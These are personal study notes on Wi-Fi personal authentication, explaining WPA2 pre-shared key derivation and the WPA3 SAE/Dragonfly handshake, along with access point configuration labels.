adam's notes

Wi-Fi Personal Authentication

  • 3 types of Wi-Fi authentication:
    • personal
      • pre-shared key (PSK)
      • Simultaneous Authentication of Equals (SAE)
    • open
    • enterprise

WPA2 Pre-Shared Key Authentication

Pre-shared key (PSK) is a wireless network authentication mode where a passphrase-based mechanism is used to allow group authentication to a wireless network. The passphrase is used to derive an encryption key.

  • pre-shared key (PSK) authentication uses a passphrase to generate the key that is used to encrypt communications
    • referred to as group authentication
      • group of users shares the same secret
    • administrator configures a passphrase of 8-63 ASCII characters
      • converted to a 256-bit hash-based message authentication code (HMAC)
        • expressed as a 64-character hex value using PBKDF2 key stretching algorithm
        • called pairwise master key (PMK)
          • used as part of WPA2’s four-way handshake to derive various session keys
    • same secret must be configured on the access point and on each node
    • passphrase must be at least 14 characters long
      • to try to mitigate risks from cracking

WPA3 Personal Authentication

  • still uses a passphrase to authenticate stations
    • but changes the method by which this secret is used to agree session keys
    • scheme used is called Password Authenticated Key Exchange (PAKE)
  • Simultaneous Authentication of Equals (SAE) protocol replaces the PSK mechanism for creating the Pairwise Master Key (PMK)
    • but 4-way handshake is still used for key exchange after the PMK is established
    • SAE uses the Dragonfly handshake
      • is basically Diffie-Hellman over elliptic curves key agreement combined with a hash value derived from the password and device MAC address to authenticate the nodes
      • implements ephemeral session keys providing forward secrecy
    • no way for an attacker to
      • sniff out the handshake to obtain the hash value and use a brute force or dictionary attack to recover the password

Info

  • The configuration interfaces for access points can use different labels for these methods:
    • may see WPA2-Personal and WPA3-SAE
    • rather than WPA2-PSK and WPA3-Personal
  • an access point can be configured for
    • WPA3 only
    • or with support for legacy WPA2 (WPA3-Personal Transition mode).

Graph View

Backlinks